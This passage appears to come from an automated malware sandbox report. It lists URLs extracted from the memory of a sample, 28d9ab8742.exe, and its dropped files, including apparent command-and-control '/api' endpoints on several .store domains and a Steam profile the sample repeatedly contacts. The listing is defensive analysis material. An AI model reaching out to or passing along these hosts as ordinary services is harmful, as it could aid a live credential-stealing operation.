Source: 28d9ab8742.exe, 0000001A.00000003.2890768591.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875570125.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2973952651.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.00000000017C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com:443/apiK
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: 28d9ab8742.exe, 0000001A.00000003.2851842022.00000000056E4000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2851203238.0000000005705000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2850165340.00000000056FF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2849723649.00000000056E1000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2981040217.0000000005EAF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2982939680.0000000005E8B000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2981716825.0000000005E88000.00000004.00000800.00020000.00000000.sdmp, Cookies.10.dr String found in binary or memory: https://msn.comXID/
Source: 28d9ab8742.exe, 0000001A.00000003.2851842022.00000000056E4000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2851203238.0000000005705000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2850165340.00000000056FF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2849723649.00000000056E1000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2981040217.0000000005EAF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2982939680.0000000005E8B000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2981716825.0000000005E88000.00000004.00000800.00020000.00000000.sdmp, Cookies.10.dr String found in binary or memory: https://msn.comXIDv10db
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://music.amazon.com
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://music.apple.com
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://music.yandex.com
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://navygenerayk.store:443/api
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store:443/apiZ
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://ntp.msn.cn/edge/ntp
Source: 2cc80dabc69f58b6_0.8.dr String found in binary or memory: https://ntp.msn.com
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://ntp.msn.com/edge/ntp
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: 2cc80dabc69f58b6_0.8.dr String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://open.spotify.com
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://outlook.live.com/mail/0/
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://outlook.office.com/mail/0/
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://presticitpo.store:443/api9
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://sb.scorecardresearch.com/
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scriptyprefej.store:443/api
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://srtb.msn.com/
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/m
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 28d9ab8742.exe, 0000001F.00000003.2952481863.00000000017DB000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900j
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: 28d9ab8742.exe, 0000001A.00000003.2890768591.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875570125.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.s
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C80f26d8df816a96
Source: 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: EBFHJEGDAFHIJKECFBKJJKJJDH.0.dr String found in binary or memory: https://support.mozilla.org
Source: EBFHJEGDAFHIJKECFBKJJKJJDH.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 28d9ab8742.exe, 0000001F.00000003.2998081929.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: EBFHJEGDAFHIJKECFBKJJKJJDH.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://tidal.com/
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://twitter.com/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.dr String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.dr String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.dr String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://vibe.naver.com/today
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://web.telegram.org/
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://web.whatsapp.com
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: file.exe, 00000000.00000002.2518810297.00000000232D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492153777.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875512562.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3007244384.0000000005EA5000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3009195039.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, BKJKJEHJJDAKECBFCGID.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.deezer.com/
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 28d9ab8742.exe, 0000001A.00000003.2838131813.0000000005728000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2966097346.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2965902429.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, IJECBGIJ.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: content_new.js.8.dr, content.js.8.dr String found in binary or memory: https://www.google.com/chrome
Source: file.exe, 00000000.00000003.2358800633.000000002327D000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2848879088.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2838131813.0000000005728000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2966097346.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2980327399.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2965902429.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2979808969.0000000005EE1000.00000004.00000800.00020000.00000000.sdmp, IJECBGIJ.0.dr, ECGDBAEH.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: 0e09cae2-b3ca-49c8-af40-a29526af4444.tmp.10.dr String found in binary or memory: https://www.googleapis.com
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.iheart.com/podcast/
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.instagram.com
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.last.fm/
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.messenger.com
